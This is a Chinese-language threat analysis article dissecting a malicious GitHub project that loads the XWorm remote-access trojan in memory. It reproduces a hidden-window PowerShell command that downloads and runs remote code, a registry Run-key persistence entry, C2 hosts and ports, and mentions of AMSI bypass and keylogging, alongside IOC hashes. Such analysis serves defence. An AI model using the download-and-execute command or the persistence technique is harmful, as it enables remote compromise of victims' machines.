网安教育
培养网络安全人才
技术交流、学习咨询
近期,笔者在浏览威胁情报时,发现有人在twitter上发布了一条推文,推文中列出了一些恶意IOC信息,同时还列出了一个与IOC信息相关联的恶意github项目的截图。
笔者尝试访问了一下这个恶意github项目,发现此项目于2024年5月12日创建并更新第一个恶意文件,此外,在本周内,此项目还曾有过文件更新的记录。
为了能够详细的对此恶意github项目进行剖析,笔者尝试对此github项目中的系列样本进行了对比分析,发现此github项目中的木马还挺有意思,此github项目中的木马具有一定的运行逻辑,同时不同木马在运行过程中,均会在内存中释放多种不同载荷,最后以达到在内存中加载运行XWormRAT远控程序的效果。
相关截图如下:
直接访问github项目即可查看createassembly.txt样本代码内容,通过分析,梳理此样本功能为:
添加HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunDriver Diag注册表项,以实现自启动,注册表项内容为:REGSVR32 /s DriverDiagnosis
在%temp%目录中释放隐藏COM组件文件:DriverDiagnosis.dll
加载执行DriverDiagnosis.dll文件
相关代码截图如下:
添加自启动
通过分析,发现此样本运行后,将在注册表中创建自启动项。
相关截图如下:
释放并执行DriverDiagnosis.dll
通过分析,发现此样本运行后,将在%TEMP%目录中释放并执行隐藏COM组件文件:DriverDiagnosis.dll。
相关截图如下:
通过分析,发现释放的DriverDiagnosis.dll文件是一个COM组件文件,运行后将外链获取后续powershell代码,然后调用powershell命令执行。
PDB信息
通过分析,提取此样本的PDB信息如下:
1C:UsersAdministrator.ADMINISTRATORDesktopCMDLL-masterx64ReleaseCmd.pdb
相关截图如下:
执行powershell
通过分析,提取此样本中的powershell命令如下:
1"powershell.exe -windowstyle h -command iex(iwr t.ly/8evEY)"
相关代码截图如下:
外链下载gaber.txt
对内置的powershell命令进行剖析,发现短链接网址t.ly/8evEY的对应解析地址为:https://raw.githubusercontent.com/jonathansimms1234567/re4ts3e4ts3e4gwase4r5tsergsergs/main/gaber.txt
相关截图如下:
通过分析,梳理此样本功能为:
利用bypassAmsi技术实现绕过AMSI的效果
内存加载PE文件
bypassAmsi
通过分析,尝试对样本中的16进制代码进行解析转换,并重新拼接样本代码,梳理发现此段代码的功能为利用bypassAmsi技术实现绕过AMSI的效果,相关代码截图如下:
内存加载XWormRAT
通过分析,发现此样本运行后,将在内存中加载执行PE文件,相关代码截图如下:
尝试编写脚本转换代码中的载荷数据,成功提取PE文件,PE文件信息如下:
1文件名称:gaber.txt_decryptedBytes_RAT
2文件大小:61952 字节
3文件版本:1.0.0.0
4MD5 :7B87DC448C231FDA9F181AE2BBFA5D13
5SHA1 :23CE77011232F258710A47D7D6B427006CDD8967
6CRC32 :18DD0EAB
进一步对此PE文件进行分析,发现此PE文件即为XWormRAT远控程序,相关代码截图如下:
XWormRAT配置信息
备注:针对XWormRAT样本的功能分析,笔者将在文章最后一节进行剖析
通过分析,梳理提取XWormRAT样本的配置信息如下:
1<123456789>
2<Xwormmm>
3XWorm V5.2
4USB.exe
5https://pastebin.com/raw/zNCj2Utm
相关代码截图如下:
尝试访问pastebin网站获取外链地址信息如下:
1localbeheaders.mcgo.io:4411
访问截图如下:
通过分析,梳理发现此样本功能与gaber.txt样本功能相同。
bypassAmsi
通过分析,发现此样本运行后,也将利用bypassAmsi技术实现绕过AMSI的效果,相关代码截图如下:
内存加载XWormRAT
通过分析,发现此样本运行后,将在内存中加载执行PE文件,相关代码截图如下:
尝试编写脚本转换代码中的载荷数据,成功提取PE文件,PE文件信息如下:
1文件名称:customer_p4yl0ad.txt_decryptedbytes_RAT
2文件大小:52736 字节
3文件版本:1.0.0.0
4MD5 :ADA55D22F9AED7DDEE6E9AC5B78F164D
5SHA1 :4F6599EEC26904465ABA1E8711C2A9FCC55A2403
6CRC32 :26D42DBE
进一步对此PE文件进行分析,发现此PE文件也是一款XWormRAT远控程序,相关代码截图如下:
XWormRAT配置信息
备注:针对XWormRAT样本的功能分析,笔者将在文章最后一节进行剖析
通过分析,梳理提取XWormRAT样本的配置信息如下:
1198.23.187.140
24646
3<123456789>
4<Xwormmm>
5XWorm V5.0
6USB.exe
相关代码截图如下:
通过分析,梳理发现此样本功能与gaber.txt、customer_p4yl0ad.txt样本的功能略有些不同:
gaber.txt、customer_p4yl0ad.txt:直接内存加载XWormRAT远控程序;
efawef.txt:内存加载shellcode,shellcode内存加载XWormRAT远控程序;
bypassAmsi
通过分析,发现此样本中也存在大量编码数据,相关代码截图如下:
对编码数据进行解码,然后将解码后的数据进行拼接,发现此段代码的功能也是利用bypassAmsi技术实现绕过AMSI的效果,拼接后的关键代码截图如下:
内存加载shellcode
通过分析,发现此样本运行后,将在内存中加载执行shellcode代码,相关代码截图如下:
内存加载XWormRAT
尝试对shellcode代码进行动态调试,发现此shellcode代码运行后,将在内存中加载执行PE文件,相关截图如下:
尝试提取PE文件载荷,梳理PE文件信息如下:
1文件名称:efawef_shellcode_RAT
2文件大小:36864 字节
3文件版本:0.0.0.0
4MD5 :F14391D4B59BF55E05357D5A585C5138
5SHA1 :8670DDE5E46B3207BAF4C55251F56278DBB02B4B
6CRC32 :C71177D6
进一步对此PE文件进行分析,发现此PE文件也是一款XWormRAT远控程序,相关代码截图如下:
XWormRAT配置信息
备注:针对XWormRAT样本的功能分析,笔者将在文章最后一节进行剖析
通过分析,梳理提取XWormRAT样本的配置信息如下:
1localbeheaders.mcgo.io
24411
3<123456789>
4<Xwormmm>
5IVANofficial
6USB.exe
相关代码截图如下:
在这里,笔者将使用efawef.txt样本释放的XWormRAT远控程序作为样本案例进行剖析。
代码混淆
通过分析,笔者发现此样本被混淆处理过,相关代码截图如下:
尝试使用de4dot工具对此样本进行去混淆处理,相关代码截图如下:
解密配置信息
通过分析,发现此样本运行后,将调用解密算法对其内置的配置信息进行解密,解密后内容如下:
1localbeheaders.mcgo.io
24411
3<123456789>
4<Xwormmm>
5IVANofficial
6USB.exe
解密前字符串数据截图如下:
解密算法截图如下:
远控指令
通过分析,梳理提取XWormRAT远控程序的远控指令如下:
相关代码截图如下:
键盘记录
通过分析,发现此样本还存在键盘记录功能,相关代码截图如下:
动态加载插件
基于网络调研,笔者在github上发现了一个Xworm-Crack项目,相关截图如下:
备注:由于不清楚是环境原因还是怎么的,笔者未能成功对其模拟使用。
尝试对其项目文件进行剖析,笔者发现在此项目的Plugins目录中存在大量dll文件,进一步对比分析,笔者发现此系列文件即为XWormRAT远控程序远控功能插件,因此,笔者推测XWormRAT远控程序的远控功能逻辑与EagleMonitorRAT、Xeno-RAT远控程序的远控逻辑相同,均是通过动态加载插件DLL程序实现的远控功能。
相关截图如下:
尝试对恶意github项目中的robloxplayer.exe及marvel world.themepack文件进行剖析,笔者暂未发现相关异常行为,相关截图如下:
为了能够快速的将gaber.txt、customer_p4yl0ad.txt样本中的10进制数据转换为16进制载荷,笔者尝试编写了一个脚本文件可实现上述数据转换功能,相关代码如下:
1package main
2
3import (
4 "encoding/hex"
5 "fmt"
6 "strconv"
7 "strings"
8)
9
10func main() {
11 decryptedBytes := "77,90,144,0,3,0,0,0,4,0,0,0,255,省略后续载荷"
12 datas := strings.Split(decryptedBytes, ",")
13 output := []byte{}
14 for _, data := range datas {
15 num, _ := strconv.Atoi(data)
16 output = append(output, byte(num))
17 }
18 fmt.Println(hex.EncodeToString(output))
19}
提取梳理相关IOC信息如下:
1#createassembly.txt
22AE2FC8AA260167415BFEBC1078C5092
3
4#DriverDiagnosis.dll
54C9368DBF637B37674AF658B5F73232D
6t.ly/8evEY
7https://raw.githubusercontent.com/jonathansimms1234567/re4ts3e4ts3e4gwase4r5tsergsergs/main/gaber.txt
8
9#gaber.txt
1005110972AD5B31B3B5AB8D3E82E0B283
11
12#gaber.txt_decryptedBytes_RAT
137B87DC448C231FDA9F181AE2BBFA5D13
14https://pastebin.com/raw/zNCj2Utm
15localbeheaders.mcgo.io:4411
16
17#customer_p4yl0ad.txt
1897896726D7BB3027938500F395C529B6
19
20#customer_p4yl0ad.txt_decryptedbytes_RAT
21ADA55D22F9AED7DDEE6E9AC5B78F164D
22198.23.187.140:4646
23
24#efawef.txt
2597B92BADF904B5D3CB95EA7F72591BA1
26
27#efawef_shellcode_RAT
28F14391D4B59BF55E05357D5A585C5138
29localbeheaders.mcgo.io:4411
文:T0daySeeker
原文链接:https://xz.aliyun.com/t/14762?time__1311=mqmx9QwxnDyiD%2FD0Dx2nUG8RbbUtDGuGD&alichlgref=https%3A%2F%2Fxz.aliyun.com%2F#toc-0
版权声明:著作权归作者所有。如有侵权请联系删除
原文始发于微信公众号(开源聚合网络空间安全研究院):【实例剖析】未知攻击团伙利用github传播XWorm恶意软件
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论